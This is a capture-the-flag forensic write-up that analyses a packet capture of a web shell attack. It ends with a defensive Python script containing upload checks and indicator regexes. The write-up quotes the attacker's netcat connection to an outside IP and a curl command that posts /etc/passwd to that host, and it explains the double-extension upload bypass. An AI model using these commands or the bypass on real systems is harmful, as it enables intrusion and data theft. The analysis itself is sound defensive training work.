Before starting the challenge we have to do a couple of things.
First, open Statistics > Protocol Hierarchy to see which protocols are used in the packets.
We will see TCP and HTTP.
Second, open Statistics > Conversations to see which IPs connect with each other.
Now we are ready for the challenge.
Q1 Understanding the geographical origin of the attack aids in geo-blocking measures and threat intelligence analysis. What city did the attack originate from?
Using an IP geolocation lookup on the attacker's IP.
ans: Tianjin
Q2 Knowing the attacker's user-agent assists in creating robust filtering rules. What's the attacker's user agent?
Using Follow TCP Stream we get the attacker's user agent:
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Q3 We need to identify if there were potential vulnerabilities exploited. What's the name of the malicious web shell uploaded?
First we follow the HTTP stream and find POST requests in packets 53 and 63.
In this challenge the attacker uploaded two web shells: the first called image.php and the second called image.jpg.php.
In packet 53 the image.php web shell gets an "invalid format" response, so it did not work (in this case we can guess that the upload location on the website only accepts photos with an extension like jpg or png, so the attacker changed the extension to image.jpg.php, which is accepted in packet 63).
We notice this command in the PHP file: nc 117.11.88.124 8080. That means the attacker opens a connection on port 8080 using the netcat tool (with netcat the connection is not encrypted, unlike socat).
Q4 Knowing the directory where files uploaded are stored is important for reinforcing defenses against unauthorized access. Which directory is used by the website to store the uploaded files?
Following the HTTP stream, in packet 138 we see the web shell at the path /reviews/uploads/image.jpg.php.
After the attacker accessed this path he gained access to the machine and could run commands on the victim machine.
Q5 Identifying the port utilized by the web shell helps improve firewall configurations for blocking unauthorized outbound traffic. What port was used by the malicious web shell?
To know which port the attacker used for the web shell we can read it from the command written in the PHP file, nc 117.11.88.124 8080, so the port is 8080.
Q6 Understanding the value of compromised data assists in prioritizing incident response actions. What file was the attacker trying to exfiltrate?
To know which file the attacker was trying to exfiltrate we go to packet 140, which includes all the commands the attacker ran on the victim machine.
We see this command: curl -X POST -d /etc/passwd http://117.11.88.124:443/ (curl is used on the command line or in scripts to transfer data).
So the file is passwd; it contains a list of the system's accounts.
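As an added example (not part of the original writeup or the challenge's site code), the Python script below reproduces the two findings from Q3 and Q6 on constructed data: an assumed substring extension check that accepts image.jpg.php but rejects image.php, the allow-list check that would have blocked it, and indicator regexes that flag the nc 117.11.88.124 8080 connection and the curl upload of /etc/passwd in a command log. The multipart part and the command log are constructed samples shaped like packets 63 and 140, and the weak filter is only a guess at why the site behaved as it did.

```python
import os
import re

# Constructed sample of a multipart upload part shaped like packet 63 in the
# writeup (filename image.jpg.php, PHP body); not the real capture.
SAMPLE_PART = (
    'Content-Disposition: form-data; name="file"; filename="image.jpg.php"\r\n'
    'Content-Type: image/jpeg\r\n\r\n'
    '<?php ... nc 117.11.88.124 8080 ... ?>'
)
# Constructed command log shaped like packet 140 in the writeup.
SAMPLE_CMDS = "id\ncurl -X POST -d /etc/passwd http://117.11.88.124:443/\n"

ALLOWED_EXT = {".jpg", ".jpeg", ".png"}

def parse_part(part):
    """Split one multipart part into (filename, content_type, body)."""
    headers, _, body = part.partition("\r\n\r\n")
    fname = re.search(r'filename="([^"]*)"', headers)
    ctype = re.search(r"Content-Type:\s*(\S+)", headers)
    return (fname.group(1) if fname else "", ctype.group(1) if ctype else "", body)

def weak_check(filename):
    """Substring check (assumed): lets image.jpg.php through, rejects image.php."""
    return any(ext in filename.lower() for ext in ALLOWED_EXT)

def strict_check(filename, body):
    """Allow-list the final extension, reject extra dots and PHP open tags."""
    root, ext = os.path.splitext(os.path.basename(filename))
    if ext.lower() not in ALLOWED_EXT or "." in root:
        return False
    return "<?" not in body

INDICATORS = {
    "netcat-connect": re.compile(r"\bnc\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b"),
    "curl-post-file": re.compile(r"\bcurl\b.*\s-d\s+/etc/\w+"),
    "php-tag": re.compile(r"<\?php"),
}

def scan_indicators(text):
    """Return the names of every indicator regex that matches in text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

if __name__ == "__main__":
    fname, ctype, body = parse_part(SAMPLE_PART)
    print(fname, ctype, "weak:", weak_check(fname), "strict:", strict_check(fname, body))
    print(scan_indicators(body), scan_indicators(SAMPLE_CMDS))
```

The same indicator scan can be run over the text of a Follow TCP Stream export to locate the packets that Q3 and Q6 point at.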